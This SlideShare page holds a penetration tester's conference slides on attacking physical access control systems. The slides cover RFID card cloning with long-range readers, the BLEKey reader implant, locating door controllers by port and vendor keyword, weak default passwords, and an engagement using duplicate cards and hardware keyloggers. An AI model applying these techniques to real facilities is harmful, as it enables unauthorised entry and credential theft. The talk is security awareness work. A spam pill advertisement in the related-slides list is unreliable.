SlideShare una empresa de Scribd logo

Valerie Thomas - All Your Door Belong to Me - Attacking Physical Access Systems

Descargar como PPTX, PDF
C
centralohioissa

Attacking Physical Access Systems

Tecnología
1 de 67
AllYour Door Belong To Me – Attacking Physical Access Systems VALERIE THOMAS EXECUTIVE SECURITY CONSULTANT @HACKTRESS09
• Executive Security Consultant for Securicon • 10+ years in Information Security • Coauthor of Building A Security Awareness Program • Social Engineering trainer • Physical access “enthusiast” Introduction
Agenda • Why this talk? • Topology of a physical access system (PACS) • Why PACS deployments are insecure • Attack surfaces and exploits • Putting it all together for complete takeover
What Is A Physical Access System? A Physical Access Systems (PACS) consists of several components working together to ensure that access is granted or denied to a controlled area when appropriate.
Why Physical Access Systems?
PACS Components • Access control point • Door • Gate • Turnstile • Credential Reader • Credential • Access card • Electronic fob • Personal identification number (PIN) • Biometric
Access Cards Low frequency • 125kHz • Small amount of data • Unencrypted High frequency • 13.56 MHz • Large amount of data • Sometimes encrypted
Access Cards
PACS components • Access control panel • Decodes binary data • Compares card data to an access list, then grants or denies entry
• Access control server • Software provided by manufacturer • Usually aWindows server • Maintains card records • Maintains access groups • Card format details • Event monitoring • Door components • Electric strike • Door contact • Request to exit (RTE) PACS components
How credentials are read https://media.blackhat.com/us-13/US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdf
https://en.wikipedia.org/?title=Access_control#/media/File:Access_control_door_wiring.png
https://en.wikipedia.org/?title=Access_control#/media File:Access_control_topologies_main_controller_a.png
The Split Personality of Security Computer Security • Protects valuable assets • Typically reports to Technology or Financial Officers • “You must be really smart” • Controls designed and implemented by network security professionals Physical Security • Protects valuable assets • Typically reports to Administration or Facilities Organization • “You’ll get a better job someday” • Controls designed and implemented by electrical contractors
Why PACS deployments are insecure • The gap between physical and cyber security is closing • The physical security industry is ~15 years behind IT • No security maturity model • Vendors implement features without security testing • Heavily reliant on IT but lack understanding • Often deployed and forgotten
HID iClass • The card and reader perform mutual authentication using a 64 bit encryption key • This key is programmed into the reader at the manufacture • Don’t worry - It’s encrypted! Why PACS deployments are insecure
https://www.blackhat.com/docs/us-15/materials/us-15-Evenchick-Breaking-Access-Controls-With-BLEKey-wp.pdf
Physical security culture • Majority are former military/defense • Lack technical understanding of PACS • Unaccustomed to patching/addressing vulnerabilities • Vendor loyal • Resistant to change Why PACS deployments are insecure
Attack surfaces and exploits • Access cards • Readers • Request to exit devices • Access control panel • Access control server • Workstations
Access card attacks
Access card attacks - Long Range • Weaponized long range reader (read & record) • Does not clone/write • Read distance is ~2ft • Available for • Proximity • iClass (Standard Security) • Indala
PROS • Improved read range • Stores hundreds of card reads • No interaction required – just power on CONS • Expensive =( • Can misread custom card formats Access card attacks - Long Range
Design 1 – Tastic RFID Thief
Tastic RFID Thief Output File
Tastic RFID Thief Parts list and design details: http://www.bishopfox.com/resources/tools/rfid- hacking/attack-tools/
Design 2 - RavenHID
RavenHID • BLE Mini Add-on (http://redbearlab.com) • Parts list and design details https://github.com/emperorcow/ravenhid
Long Range Power Must have 12V Output
Access card attacks – low tech Most vendors print the card number ONTHE CARD
Access card attacks – low tech And on the box
Reader attacks - BLEKey • Inserted in-line with the reader • Records card data and sends via Bluetooth • Replays data • Reader DoS
Reader attacks - BLEKey Blackhat presentation https://www.blackhat.com/docs/us-15/materials/us- 15-Evenchick-Breaking-Access-Controls-With- BLEKey.pdf Parts list and software https://github.com/linklayer/BLEKey
Request to exit device attacks
Access control panel attacks • Remember how important door controllers are? • Medium to large environments will have multiple door controllers • These controllers are usually reachable from the general address pool • Often have very useful data
Hunting Door Controllers • Many controllers have features to simplify configuration • Embedded web servers • FTP • SNMP • Access is generally open or protected with a weak default password • Many allow anonymous FTP
Hunting Door Controllers Keep in mind… • These devices can be very fragile – heavy scanning is not recommended • Many of the web interfaces will only work in IE • Don’t change any settings
Hunting Door Controllers Ports to look for • TCP 21 • TCP 23 • TCP 80 • UDP 161 • TCP 9999 Keywords in DNS/Nessus Scans • Tyco • iStar • Matrix • Lenel
What Can Controllers Tell Us? • Card numbers and access log • Areas they control • IPs of other controllers • IPs of the access server • Passwords!
Web Interface
Web Interface
Web Interface
Web Interface
VertX https://github.com/brad-anton/VertX
Hunting Access Servers • Usually not as obvious as controllers • Majority areWindows Servers • Can often obtain the IP from a controller • DNS search is a fairly reliable method
Hunting Access Servers DNS/Nessus Keywords • CCURE/C-CURE/C*CURE • OnGuard • AccessControl • FacilityCommander • Additional keywords at http://www.capterra.com/physical-security- software/
Other PACS Resources PACS information and card data can be found in other areas of the network • SharePoint • Email • Document shares (usually in null session) • Guard workstations
Putting it all together • Long range reader to collect card data • Programmed duplicate cards and created fake employee card • Observed security guard daily activity
Putting it all together • Placed hardware keyloggers • Captured credentials and other useful data • Gained access to access server • Produced duplicate cards for employees with the most access
Putting it all together
Putting it all together
Game Over
Long road ahead • Physical security has a lot of catching up to do • Will require huge culture shift • Many of the misconfigurations discussed are preventable • PACS security checklist (in progress)
Valerie.Thomas@securicon.com @hacktress09

Recomendados

Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
centralohioissa
 
Jason Kent - AppSec Without Additional Tools
Jason Kent - AppSec Without Additional ToolsJason Kent - AppSec Without Additional Tools
Jason Kent - AppSec Without Additional Tools
centralohioissa
 
Kent King - PKI: Do You Know Your Exposure?
Kent King - PKI: Do You Know Your Exposure?Kent King - PKI: Do You Know Your Exposure?
Kent King - PKI: Do You Know Your Exposure?
centralohioissa
 
NextGen Endpoint Security for Dummies
NextGen Endpoint Security for DummiesNextGen Endpoint Security for Dummies
NextGen Endpoint Security for Dummies
Atif Ghauri
 
BeyondCorp - Google Security for Everyone Else
BeyondCorp - Google Security for Everyone ElseBeyondCorp - Google Security for Everyone Else
BeyondCorp - Google Security for Everyone Else
Ivan Dwyer
 
Practical SME Security on a Shoestring
Practical SME Security on a ShoestringPractical SME Security on a Shoestring
Practical SME Security on a Shoestring
NCC Group
 
Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!
centralohioissa
 
Threat Modeling - Locking the Door to Vulnerabilities
Threat Modeling - Locking the Door to VulnerabilitiesThreat Modeling - Locking the Door to Vulnerabilities
Threat Modeling - Locking the Door to Vulnerabilities
Security Innovation
 

Recomendados

Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
centralohioissa
 
Jason Kent - AppSec Without Additional Tools
Jason Kent - AppSec Without Additional ToolsJason Kent - AppSec Without Additional Tools
Jason Kent - AppSec Without Additional Tools
centralohioissa
 
Kent King - PKI: Do You Know Your Exposure?
Kent King - PKI: Do You Know Your Exposure?Kent King - PKI: Do You Know Your Exposure?
Kent King - PKI: Do You Know Your Exposure?
centralohioissa
 
NextGen Endpoint Security for Dummies
NextGen Endpoint Security for DummiesNextGen Endpoint Security for Dummies
NextGen Endpoint Security for Dummies
Atif Ghauri
 
BeyondCorp - Google Security for Everyone Else
BeyondCorp - Google Security for Everyone ElseBeyondCorp - Google Security for Everyone Else
BeyondCorp - Google Security for Everyone Else
Ivan Dwyer
 
Practical SME Security on a Shoestring
Practical SME Security on a ShoestringPractical SME Security on a Shoestring
Practical SME Security on a Shoestring
NCC Group
 
Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!Jim Wojno: Incident Response - No Pain, No Gain!
Jim Wojno: Incident Response - No Pain, No Gain!
centralohioissa
 
Threat Modeling - Locking the Door to Vulnerabilities
Threat Modeling - Locking the Door to VulnerabilitiesThreat Modeling - Locking the Door to Vulnerabilities
Threat Modeling - Locking the Door to Vulnerabilities
Security Innovation
 
Managing Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber SecurityManaging Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber Security
Priyanka Aash
 
IDC Security 2014, Endpoint Security in Depth
IDC Security 2014, Endpoint Security in DepthIDC Security 2014, Endpoint Security in Depth
IDC Security 2014, Endpoint Security in Depth
Ken Tulegenov
 
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
Savvius, Inc
 
Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration
Fidelis Cybersecurity
 
Breaking and entering how and why dhs conducts penetration tests
Breaking and entering how and why dhs conducts penetration testsBreaking and entering how and why dhs conducts penetration tests
Breaking and entering how and why dhs conducts penetration tests
Priyanka Aash
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and Orchestration
Greg Foss
 
CSF18 - Implementing Gartners #1 - Whitelisting- Karim El-Melhaoui
CSF18 - Implementing Gartners #1 - Whitelisting- Karim El-MelhaouiCSF18 - Implementing Gartners #1 - Whitelisting- Karim El-Melhaoui
CSF18 - Implementing Gartners #1 - Whitelisting- Karim El-Melhaoui
NCCOMMS
 
Secure Your Data with Fidelis Network® for DLP
Secure Your Data with Fidelis Network® for DLPSecure Your Data with Fidelis Network® for DLP
Secure Your Data with Fidelis Network® for DLP
Fidelis Cybersecurity
 
Why Zero Trust Yields Maximum Security
Why Zero Trust Yields Maximum SecurityWhy Zero Trust Yields Maximum Security
Why Zero Trust Yields Maximum Security
Priyanka Aash
 
CIS Security Benchmark
CIS Security BenchmarkCIS Security Benchmark
CIS Security Benchmark
Rahul Khengare
 
RSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTRSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APT
Lee Wei Yeong
 
BeyondCorp New York Meetup: Closing the Adherence Gap
BeyondCorp New York Meetup: Closing the Adherence GapBeyondCorp New York Meetup: Closing the Adherence Gap
BeyondCorp New York Meetup: Closing the Adherence Gap
Ivan Dwyer
 
Security Culture from Concept to Maintenance: Secure Software Development Lif...
Security Culture from Concept to Maintenance: Secure Software Development Lif...Security Culture from Concept to Maintenance: Secure Software Development Lif...
Security Culture from Concept to Maintenance: Secure Software Development Lif...
Dilum Bandara
 
BeyondCorp: Closing the Adherence Gap
BeyondCorp: Closing the Adherence GapBeyondCorp: Closing the Adherence Gap
BeyondCorp: Closing the Adherence Gap
Ivan Dwyer
 
Security precognition chaos engineering in incident response
Security precognition chaos engineering in incident responseSecurity precognition chaos engineering in incident response
Security precognition chaos engineering in incident response
Priyanka Aash
 
BeyondCorp Seattle Meetup: Closing the Adherence Gap
BeyondCorp Seattle Meetup: Closing the Adherence GapBeyondCorp Seattle Meetup: Closing the Adherence Gap
BeyondCorp Seattle Meetup: Closing the Adherence Gap
Ivan Dwyer
 
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
Shah Sheikh
 
Extending Your Network Cloud Security to AWS
Extending Your Network Cloud Security to AWSExtending Your Network Cloud Security to AWS
Extending Your Network Cloud Security to AWS
Fidelis Cybersecurity
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
Quest
 
BeyondCorp Myths: Busted
BeyondCorp Myths: BustedBeyondCorp Myths: Busted
BeyondCorp Myths: Busted
Ivan Dwyer
 
CNIT 121: 3 Pre-Incident Preparation
CNIT 121: 3 Pre-Incident PreparationCNIT 121: 3 Pre-Incident Preparation
CNIT 121: 3 Pre-Incident Preparation
Sam Bowne
 
Power Grid Communications & Control Systems
Power Grid Communications & Control SystemsPower Grid Communications & Control Systems
Power Grid Communications & Control Systems
fajjarrehman
 

Más contenido relacionado

La actualidad más candente

Managing Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber SecurityManaging Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber Security
Priyanka Aash
 
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
Savvius, Inc
 
Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration
Fidelis Cybersecurity
 
Extending Your Network Cloud Security to AWS
Extending Your Network Cloud Security to AWSExtending Your Network Cloud Security to AWS
Extending Your Network Cloud Security to AWS
Fidelis Cybersecurity
 

La actualidad más candente (20)

Managing Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber SecurityManaging Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber Security
 
IDC Security 2014, Endpoint Security in Depth
IDC Security 2014, Endpoint Security in DepthIDC Security 2014, Endpoint Security in Depth
IDC Security 2014, Endpoint Security in Depth
 
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
All Hope is Not Lost Network Forensics Exposes Today's Advanced Security Thr...
 
Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration Fidelis Endpoint® - Live Demonstration
Fidelis Endpoint® - Live Demonstration
 
Breaking and entering how and why dhs conducts penetration tests
Breaking and entering how and why dhs conducts penetration testsBreaking and entering how and why dhs conducts penetration tests
Breaking and entering how and why dhs conducts penetration tests
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and Orchestration
 
CSF18 - Implementing Gartners #1 - Whitelisting- Karim El-Melhaoui
CSF18 - Implementing Gartners #1 - Whitelisting- Karim El-MelhaouiCSF18 - Implementing Gartners #1 - Whitelisting- Karim El-Melhaoui
CSF18 - Implementing Gartners #1 - Whitelisting- Karim El-Melhaoui
 
Secure Your Data with Fidelis Network® for DLP
Secure Your Data with Fidelis Network® for DLPSecure Your Data with Fidelis Network® for DLP
Secure Your Data with Fidelis Network® for DLP
 
Why Zero Trust Yields Maximum Security
Why Zero Trust Yields Maximum SecurityWhy Zero Trust Yields Maximum Security
Why Zero Trust Yields Maximum Security
 
CIS Security Benchmark
CIS Security BenchmarkCIS Security Benchmark
CIS Security Benchmark
 
RSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTRSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APT
 
BeyondCorp New York Meetup: Closing the Adherence Gap
BeyondCorp New York Meetup: Closing the Adherence GapBeyondCorp New York Meetup: Closing the Adherence Gap
BeyondCorp New York Meetup: Closing the Adherence Gap
 
Security Culture from Concept to Maintenance: Secure Software Development Lif...
Security Culture from Concept to Maintenance: Secure Software Development Lif...Security Culture from Concept to Maintenance: Secure Software Development Lif...
Security Culture from Concept to Maintenance: Secure Software Development Lif...
 
BeyondCorp: Closing the Adherence Gap
BeyondCorp: Closing the Adherence GapBeyondCorp: Closing the Adherence Gap
BeyondCorp: Closing the Adherence Gap
 
Security precognition chaos engineering in incident response
Security precognition chaos engineering in incident responseSecurity precognition chaos engineering in incident response
Security precognition chaos engineering in incident response
 
BeyondCorp Seattle Meetup: Closing the Adherence Gap
BeyondCorp Seattle Meetup: Closing the Adherence GapBeyondCorp Seattle Meetup: Closing the Adherence Gap
BeyondCorp Seattle Meetup: Closing the Adherence Gap
 
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
DTS Solution - ISACA UAE Chapter - ISAFE 2014 - RU PWNED - Living a Life as a...
 
Extending Your Network Cloud Security to AWS
Extending Your Network Cloud Security to AWSExtending Your Network Cloud Security to AWS
Extending Your Network Cloud Security to AWS
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
 
BeyondCorp Myths: Busted
BeyondCorp Myths: BustedBeyondCorp Myths: Busted
BeyondCorp Myths: Busted
 

Similar a Valerie Thomas - All Your Door Belong to Me - Attacking Physical Access Systems

Key Concepts for Protecting the Privacy of IBM i Data
Key Concepts for Protecting the Privacy of IBM i DataKey Concepts for Protecting the Privacy of IBM i Data
Key Concepts for Protecting the Privacy of IBM i Data
Precisely
 
What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?
Precisely
 
Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From Windows
NetSPI
 
Lock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iLock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM i
Precisely
 

Similar a Valerie Thomas - All Your Door Belong to Me - Attacking Physical Access Systems (20)

CNIT 121: 3 Pre-Incident Preparation
CNIT 121: 3 Pre-Incident PreparationCNIT 121: 3 Pre-Incident Preparation
CNIT 121: 3 Pre-Incident Preparation
 
Power Grid Communications & Control Systems
Power Grid Communications & Control SystemsPower Grid Communications & Control Systems
Power Grid Communications & Control Systems
 
Inside the Wire - thotcon 0x9
Inside the Wire - thotcon 0x9Inside the Wire - thotcon 0x9
Inside the Wire - thotcon 0x9
 
CONFidence 2014: Yaniv Miron: ATMs – We kick their ass
CONFidence 2014: Yaniv Miron: ATMs – We kick their assCONFidence 2014: Yaniv Miron: ATMs – We kick their ass
CONFidence 2014: Yaniv Miron: ATMs – We kick their ass
 
Track 5 session 2 - st dev con 2016 - security iot best practices
Track 5 session 2 - st dev con 2016 - security iot best practicesTrack 5 session 2 - st dev con 2016 - security iot best practices
Track 5 session 2 - st dev con 2016 - security iot best practices
 
CNIT 152: 3 Pre-Incident Preparation
CNIT 152: 3 Pre-Incident PreparationCNIT 152: 3 Pre-Incident Preparation
CNIT 152: 3 Pre-Incident Preparation
 
20-security.ppt
20-security.ppt20-security.ppt
20-security.ppt
 
Key Concepts for Protecting the Privacy of IBM i Data
Key Concepts for Protecting the Privacy of IBM i DataKey Concepts for Protecting the Privacy of IBM i Data
Key Concepts for Protecting the Privacy of IBM i Data
 
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure InfrastructuresPLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
 
CNIT 160 4e Security Program Management (Part 5)
CNIT 160 4e Security Program Management (Part 5)CNIT 160 4e Security Program Management (Part 5)
CNIT 160 4e Security Program Management (Part 5)
 
What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?
 
Ccna sec 01
Ccna sec 01Ccna sec 01
Ccna sec 01
 
Firewall, Router and Switch Configuration Review
Firewall, Router and Switch Configuration ReviewFirewall, Router and Switch Configuration Review
Firewall, Router and Switch Configuration Review
 
Security chapter6
Security chapter6Security chapter6
Security chapter6
 
Track 5 session 1 - st dev con 2016 - need for security for iot
Track 5 session 1 - st dev con 2016 - need for security for iotTrack 5 session 1 - st dev con 2016 - need for security for iot
Track 5 session 1 - st dev con 2016 - need for security for iot
 
Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From Windows
 
Lock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iLock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM i
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and Data
 
Open and Secure SCADA: Efficient and Economical Control, Without the Risk
Open and Secure SCADA: Efficient and Economical Control, Without the RiskOpen and Secure SCADA: Efficient and Economical Control, Without the Risk
Open and Secure SCADA: Efficient and Economical Control, Without the Risk
 
Open and Secure SCADA: Efficient and Economical Control, Without the Risk
Open and Secure SCADA: Efficient and Economical Control, Without the RiskOpen and Secure SCADA: Efficient and Economical Control, Without the Risk
Open and Secure SCADA: Efficient and Economical Control, Without the Risk
 

Más de centralohioissa

Jake Williams - Navigating the FDA Recommendations on Medical Device Security...
Jake Williams - Navigating the FDA Recommendations on Medical Device Security...Jake Williams - Navigating the FDA Recommendations on Medical Device Security...
Jake Williams - Navigating the FDA Recommendations on Medical Device Security...
centralohioissa
 
Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...
Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...
Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...
centralohioissa
 
Rafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack ChainRafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack Chain
centralohioissa
 
Ruben Melendez - Economically Justifying IT Security Initiatives
Ruben Melendez - Economically Justifying IT Security InitiativesRuben Melendez - Economically Justifying IT Security Initiatives
Ruben Melendez - Economically Justifying IT Security Initiatives
centralohioissa
 

Más de centralohioissa (20)

Mike Spaulding - Building an Application Security Program
Mike Spaulding - Building an Application Security ProgramMike Spaulding - Building an Application Security Program
Mike Spaulding - Building an Application Security Program
 
Jake Williams - Navigating the FDA Recommendations on Medical Device Security...
Jake Williams - Navigating the FDA Recommendations on Medical Device Security...Jake Williams - Navigating the FDA Recommendations on Medical Device Security...
Jake Williams - Navigating the FDA Recommendations on Medical Device Security...
 
Bob West - Educating the Board of Directors
Bob West - Educating the Board of DirectorsBob West - Educating the Board of Directors
Bob West - Educating the Board of Directors
 
Mark Villinski - Top 10 Tips for Educating Employees about Cybersecurity
Mark Villinski - Top 10 Tips for Educating Employees about CybersecurityMark Villinski - Top 10 Tips for Educating Employees about Cybersecurity
Mark Villinski - Top 10 Tips for Educating Employees about Cybersecurity
 
Dino Tsibouris & Mehmet Munur - Legal Perspective on Data Security for 2016
Dino Tsibouris & Mehmet Munur - Legal Perspective on Data Security for 2016Dino Tsibouris & Mehmet Munur - Legal Perspective on Data Security for 2016
Dino Tsibouris & Mehmet Munur - Legal Perspective on Data Security for 2016
 
Jeffrey Sweet - Third Party Risk Governance - Why? and How?
Jeffrey Sweet - Third Party Risk Governance - Why? and How?Jeffrey Sweet - Third Party Risk Governance - Why? and How?
Jeffrey Sweet - Third Party Risk Governance - Why? and How?
 
Steven Keil - BYODAWSCYW (Bring Your Own Device And Whatever Security Control...
Steven Keil - BYODAWSCYW (Bring Your Own Device And Whatever Security Control...Steven Keil - BYODAWSCYW (Bring Your Own Device And Whatever Security Control...
Steven Keil - BYODAWSCYW (Bring Your Own Device And Whatever Security Control...
 
Tre Smith - From Decision to Implementation: Who's On First?
Tre Smith - From Decision to Implementation: Who's On First?Tre Smith - From Decision to Implementation: Who's On First?
Tre Smith - From Decision to Implementation: Who's On First?
 
Gary Sheehan - Winning a Battle Doesn't Mean We Are Winning the War
Gary Sheehan - Winning a Battle Doesn't Mean We Are Winning the WarGary Sheehan - Winning a Battle Doesn't Mean We Are Winning the War
Gary Sheehan - Winning a Battle Doesn't Mean We Are Winning the War
 
Sean Whalen - How to Hack a Hospital
Sean Whalen - How to Hack a HospitalSean Whalen - How to Hack a Hospital
Sean Whalen - How to Hack a Hospital
 
Robert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software DesignRobert Hurlbut - Threat Modeling for Secure Software Design
Robert Hurlbut - Threat Modeling for Secure Software Design
 
Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...
Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...
Harry Regan - Disaster Recovery and Business Continuity - "It's never so bad ...
 
Rafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack ChainRafeeq Rehman - Breaking the Phishing Attack Chain
Rafeeq Rehman - Breaking the Phishing Attack Chain
 
Oliver Schuermann - Integrated Software in Networking - the Mystery of SDN
Oliver Schuermann - Integrated Software in Networking - the Mystery of SDNOliver Schuermann - Integrated Software in Networking - the Mystery of SDN
Oliver Schuermann - Integrated Software in Networking - the Mystery of SDN
 
Jack Nichelson - Information Security Metrics - Practical Security Metrics
Jack Nichelson - Information Security Metrics - Practical Security MetricsJack Nichelson - Information Security Metrics - Practical Security Metrics
Jack Nichelson - Information Security Metrics - Practical Security Metrics
 
Michael Woolard - Gamify Awareness Training: Failure to engage is failure to ...
Michael Woolard - Gamify Awareness Training: Failure to engage is failure to ...Michael Woolard - Gamify Awareness Training: Failure to engage is failure to ...
Michael Woolard - Gamify Awareness Training: Failure to engage is failure to ...
 
Ruben Melendez - Economically Justifying IT Security Initiatives
Ruben Melendez - Economically Justifying IT Security InitiativesRuben Melendez - Economically Justifying IT Security Initiatives
Ruben Melendez - Economically Justifying IT Security Initiatives
 
Ed McCabe - Putting the Intelligence back in Threat Intelligence
Ed McCabe - Putting the Intelligence back in Threat IntelligenceEd McCabe - Putting the Intelligence back in Threat Intelligence
Ed McCabe - Putting the Intelligence back in Threat Intelligence
 
Ofer Maor - Security Automation in the SDLC - Real World Cases
Ofer Maor - Security Automation in the SDLC - Real World CasesOfer Maor - Security Automation in the SDLC - Real World Cases
Ofer Maor - Security Automation in the SDLC - Real World Cases
 
Jim Libersky: Cyber Security - Super Bowl 50
Jim Libersky: Cyber Security - Super Bowl 50Jim Libersky: Cyber Security - Super Bowl 50
Jim Libersky: Cyber Security - Super Bowl 50
 

Último

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 

Último (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
